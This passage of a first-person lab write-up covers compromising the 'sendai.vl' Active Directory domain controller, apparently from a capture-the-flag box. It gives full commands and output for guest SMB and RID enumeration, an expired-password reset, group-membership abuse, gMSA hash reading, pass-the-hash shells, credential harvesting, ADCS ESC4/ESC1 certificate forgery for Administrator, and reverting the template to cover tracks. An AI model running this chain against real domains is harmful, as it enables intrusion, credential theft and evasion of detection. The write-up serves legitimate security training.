|   Check 3 (port 64934/udp): CLEAN (Timeout)
|   Check 4 (port 41472/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked


TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   46.56 ms 10.10.14.1 (10.10.14.1)
2   46.95 ms 10.129.220.222 (10.129.220.222)


Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 21:27:28 2025 -- 1 IP address (1 host up) scanned in 197.26 seconds

Updating Hosts File#

To ensure proper name resolution for Kerberos authentication and other domain operations, I added the target to my local hosts file:

Terminal window
└─$ echo -e "10.129.140.152\tDC.sendai.vl\tsendai.vl\tDC" | sudo tee -a /etc/hosts
10.129.140.152  DC.sendai.vl  sendai.vl  DC

SMB Enumeration with Guest Access#

Starting reconnaissance with a guest account enumeration of available SMB shares on the target domain controller:

Terminal window
└─$ nxc smb 10.129.220.222 -u "Guest" -p "" --shares
SMB         10.129.220.222  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         10.129.220.222  445    DC               [+] sendai.vl\Guest:
SMB         10.129.220.222  445    DC               [*] Enumerated shares
SMB         10.129.220.222  445    DC               Share           Permissions     Remark
SMB         10.129.220.222  445    DC               -----           -----------     ------
SMB         10.129.220.222  445    DC               ADMIN$                          Remote Admin
SMB         10.129.220.222  445    DC               C$                              Default share
SMB         10.129.220.222  445    DC               config
SMB         10.129.220.222  445    DC               IPC$            READ            Remote IPC
SMB         10.129.220.222  445    DC               NETLOGON                        Logon server share
SMB         10.129.220.222  445    DC               sendai          READ            company share
SMB         10.129.220.222  445    DC               SYSVOL                          Logon server share
SMB         10.129.220.222  445    DC               Users           READ

The enumeration revealed that guest access was enabled, providing READ access to several shares including a company share named “sendai” and the standard Users share.

Exploring the Company Share#

Since I had read access to the “sendai” share, I explored its contents and discovered an interesting file:

alt text

Analyzing the Security Incident Report#

The incident.txt file contained a revealing security announcement from the IT department:

└─$ cat incident.txt
Dear valued employees,


We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.


To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.


We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.


If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.


Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.

This document was gold - it revealed that accounts with weak passwords had been expired, meaning users would need to reset their passwords. This suggested there might be accounts with empty passwords or in a password-must-change state.

Domain User Enumeration#

I proceeded to enumerate all domain users using RID brute forcing to identify potential targets:

Terminal window
└─$ nxc smb 10.129.220.222 -u "Guest" -p "" --rid-brute
SMB         10.129.220.222  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         10.129.220.222  445    DC               [+] sendai.vl\Guest:
SMB         10.129.220.222  445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         10.129.220.222  445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         10.129.220.222  445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         10.129.220.222  445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         10.129.220.222  445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         10.129.220.222  445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         10.129.220.222  445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         10.129.220.222  445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.220.222  445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         10.129.220.222  445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.220.222  445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.220.222  445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.220.222  445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         10.129.220.222  445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         10.129.220.222  445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.220.222  445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         10.129.220.222  445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         10.129.220.222  445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         10.129.220.222  445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         10.129.220.222  445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         10.129.220.222  445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         10.129.220.222  445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         10.129.220.222  445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         10.129.220.222  445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         10.129.220.222  445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         10.129.220.222  445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         10.129.220.222  445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         10.129.220.222  445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         10.129.220.222  445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         10.129.220.222  445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         10.129.220.222  445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         10.129.220.222  445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         10.129.220.222  445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         10.129.220.222  445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         10.129.220.222  445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         10.129.220.222  445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         10.129.220.222  445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         10.129.220.222  445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         10.129.220.222  445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         10.129.220.222  445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         10.129.220.222  445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         10.129.220.222  445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         10.129.220.222  445    DC               1131: SENDAI\support (SidTypeGroup)

I extracted all the usernames into a file for password testing:

Terminal window
└─$ cat tmp_users.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' > users.txt

Testing for Weak Password Policies#

Based on the incident report mentioning weak passwords, I tested if any users had blank passwords or were in a password-must-change state:

Terminal window
└─$ nxc smb sendai.vl -u users.txt -p "" --continue-on-success

alt text

I discovered two accounts with “STATUS_PASSWORD_MUST_CHANGE” - exactly what the incident report had hinted at. These accounts (Elliot.Yates and Thomas.Powell) had expired passwords and needed to be reset.

Password Reset and Initial Access#

To take advantage of this, I used NetExec’s password change module to set a new password for Elliot.Yates, thereby obtaining valid domain credentials:

Terminal window
└─$ nxc smb sendai.vl -u "Elliot.Yates" -p "" -M change-password -o NEWPASS=Password@123

alt text

With the password successfully changed, I now had working credentials for a domain user account.

Active Directory Analysis with BloodHound#

With valid credentials in hand, I collected comprehensive Active Directory data for analysis using BloodHound:

Terminal window
└─$ bloodhound-python -d sendai.vl -u "Elliot.Yates" -p "Password@123" -ns 10.129.125.63 -dc DC.sendai.vl -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 11S
INFO: Compressing output into 20250914234327_bloodhound.zip

After ingesting the BloodHound data, I discovered that both Elliot.Yates and Thomas.Powell were members of the “support” group, which had GenericAll privileges on the “ADMSVC” group:

alt text

This GenericAll privilege meant I could add members to the ADMSVC group, I noticed that ADMSVC group can read gmsa password of MGTSVC$, so this might be the correct path

alt text

Exploiting Group Membership Control#

To escalate privileges, I leveraged the GenericAll permission to add Elliot.Yates to the ADMSVC group:

Terminal window
└─$ bloodyAD -u "Elliot.Yates" -p "Password@123" -d sendai.vl --host dc.sendai.vl  add groupMember "ADMSVC" "ELLIOT.YATES"
[+] ELLIOT.YATES added to ADMSVC

With ADMSVC membership established, I could now access the gMSA password for the MGTSVC$ service account:

Terminal window
└─$ nxc ldap sendai.vl -u "Elliot.Yates" -p "Password@123" --gmsa
LDAP        10.129.140.152  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never)
LDAP        10.129.140.152  389    DC               [+] sendai.vl\Elliot.Yates:Password@123
LDAP        10.129.140.152  389    DC               [*] Getting GMSA Passwords
LDAP        10.129.140.152  389    DC               Account: mgtsvc$              NTLM: 9ed35c68b88f35007aa32c14c1332ce7     PrincipalsAllowedToReadPassword: admsvc

Using the extracted NTLM hash, I authenticated to the domain controller as the MGTSVC$ service account:

Terminal window
└─$ evil-winrm -i sendai.vl -u "mgtsvc$" -H "9ed35c68b88f35007aa32c14c1332ce7"


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>

Post-Exploit Enumeration and Privilege Escalation#

With access as the service account, I began exploring the system for additional credentials or attack vectors. A review of the C:\ directory revealed a configuration folder that contained database credentials:

Terminal window
*Evil-WinRM* PS C:\> ls




    Directory: C:\




Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/11/2023   5:56 AM                config
d-----         4/15/2025   8:20 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/15/2025   7:51 PM                Program Files
d-----         7/18/2023   6:11 AM                Program Files (x86)
d-----         7/18/2023  10:31 AM                sendai
d-----         7/11/2023   2:35 AM                SQL2019
d-r---         9/17/2025   1:58 AM                Users
d-----         8/18/2025   5:04 AM                Windows
-a----         4/15/2025   8:27 PM             32 user.txt
*Evil-WinRM* PS C:\> cd config
*Evil-WinRM* PS C:\config> cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

The SQL configuration file revealed credentials for the sqlsvc account. After testing various privilege escalation vectors with these credentials without success, I shifted focus to enumerating running services for additional attack surfaces.

Process and Service Enumeration#

looking at the processes I found a weird process named helpdesk

alt text

I examined the Windows registry for service configurations containing the name helpdesk:

Terminal window
*Evil-WinRM* PS C:\Users\mgtsvc$\documents> dir -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | select-string "helpdesk"

This enumeration revealed another set of credentials embedded in a service configuration for the user Clifford.Davey:

alt text

Analyzing Certificate Authority Permissions#

Referring back to the BloodHound data, I confirmed that Clifford.Davey was a member of the CA-OPERATORS group, which suggested potential access to certificate authority operations:

alt text

Certificate Template Vulnerability Assessment#

With Clifford.Davey’s credentials, I performed a comprehensive enumeration of the Active Directory Certificate Services to identify potential vulnerabilities:

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p"  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2023-07-11T12:46:19+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Owner Principals          : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Dacl Principals           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Property Enroll           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
    [+] User Enrollable Principals      : SENDAI.VL\Domain Computers
                                          SENDAI.VL\ca-operators
    [+] User ACL Principals             : SENDAI.VL\ca-operators
    [!] Vulnerabilities
      ESC4                              : User has dangerous permissions.

The enumeration revealed a critical ESC4 vulnerability in the SendaiComputer certificate template. As documented in the Certipy documentation, ESC4 (Template Hijacking) occurs when an attacker gains write permissions on a certificate template. This vulnerability allows modification of the template to create a vulnerable configuration, request a certificate using the malicious template, and potentially revert changes to cover tracks.

Template Hijacking Attack#

To exploit this vulnerability, I first saved the current template configuration and then modified it to create a vulnerable state:

Terminal window
└─$ certipy-ad -debug template -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -template SendaiComputer  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -target dc.sendai.vl  -write-default-configuration
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: '10.129.140.152'
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to 'SendaiComputer.json'
[+] Attempting to write data to 'SendaiComputer.json'
[+] Data written to 'SendaiComputer.json'
[*] Wrote current configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
[*]     nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*]     flags: 66104
[*]     pKIDefaultKeySpec: 2
[*]     pKIKeyUsage: b'\x86\x00'
[*]     pKIMaxIssuingDepth: -1
[*]     pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*]     pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*]     pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*]     pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*]     msPKI-Enrollment-Flag: 0
[*]     msPKI-Private-Key-Flag: 16
[*]     msPKI-Certificate-Name-Flag: 1
[*]     msPKI-Minimal-Key-Size: 2048
[*]     msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'

Verifying Template Modification#

After the modification, I confirmed that the certificate template now exhibited the characteristics of an ESC1 vulnerability (Enrollee Supplies Subject and allows client authentication):

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p"  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2025-09-17T21:51:59+00:00
    Permissions
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Authenticated Users
        Write Owner Principals          : SENDAI.VL\Authenticated Users
        Write Dacl Principals           : SENDAI.VL\Authenticated Users
    [+] User Enrollable Principals      : SENDAI.VL\Authenticated Users
    [+] User ACL Principals             : SENDAI.VL\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC4                              : User has dangerous permissions.

The template was now vulnerable to both ESC1 and ESC4 attacks, with the critical “Enrollee Supplies Subject” property enabled and permissions allowing authenticated users to enroll.

Administrator Certificate Request#

With the template in a vulnerable state, I requested a certificate for the Administrator account by specifying both the UPN and SID:

Terminal window
└─$ certipy-ad -debug req -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -ca sendai-DC-CA -template SendaiComputer -target dc.sendai.vl -upn "administrator@sendai.vl" -sid "S-1-5-21-3085872742-570972823-736764132-500" -dc-ip 10.129.140.152 -dc-host dc.sendai.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: None
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Trying to resolve 'dc.sendai.vl' at '10.129.140.152'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sendai.vl'
[+] Found SID in SAN URL: 'S-1-5-21-3085872742-570972823-736764132-500'
[+] Found SID in security extension: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Certificate object SID is 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Extracting Administrator Credentials#

Using the issued certificate, I extracted the Administrator’s NTLM hash through PKINIT authentication:

Terminal window
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.140.152
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[*] Certificate identities:
[*]     SAN UPN: 'administrator@sendai.vl'
[*]     SAN URL SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*]     Security Extension SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Using principal: 'administrator@sendai.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a

Achieving Domain Administrator Access#

With the Administrator’s NTLM hash in hand, I established a privileged session on the domain controller:

Terminal window
└─$ evil-winrm -i sendai.vl -u "administrator" -H cfb106feec8b89a3d98e14dcbe8d087a


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Covering Tracks#

To maintain operational security and avoid detection, I reverted the certificate template to its original configuration using the previously saved settings:

Terminal window
└─$ certipy-ad -debug template -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -template SendaiComputer  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -target dc.sendai.vl  -write-configuration SendaiComputer.json
Certipy v5.0.3 - by Oliver Lyak (ly4k)


[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: '10.129.140.152'
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to 'SendaiComputer.json'
[+] Attempting to write data to 'SendaiComputer.json'
File 'SendaiComputer.json' already exists. Overwrite? (y/n - saying no will save with a unique filename): n
[+] Using alternative filename: 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[+] Data written to 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[*] Wrote current configuration for 'SendaiComputer' to 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
[*]     nTSecurityDescriptor: b'\x01\x00\x04\x9ch\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00T\x01\x08\x00\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x00\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x03\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x00\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\xf4\x01\x00\x00\x00\x00$\x00\xff\x01\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+h\x04\x00\x00\x00\x00\x14\x00\x94\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\xf4\x01\x00\x00'
[*]     flags: 131680
[*]     pKIDefaultKeySpec: 1
[*]     pKIKeyUsage: b'\xa0\x00'
[*]     pKIMaxIssuingDepth: 0
[*]     pKICriticalExtensions: ['2.5.29.15']
[*]     pKIExpirationPeriod: b'\x00\x00]\xd2,\xf6\x8f\xff'
[*]     pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2']
[*]     pKIDefaultCSPs: ['1,Microsoft RSA SChannel Cryptographic Provider']
[*]     msPKI-Enrollment-Flag: 32
[*]     msPKI-Private-Key-Flag: 16842752
[*]     msPKI-Certificate-Name-Flag: 134217728
[*]     msPKI-Minimal-Key-Size: 4096
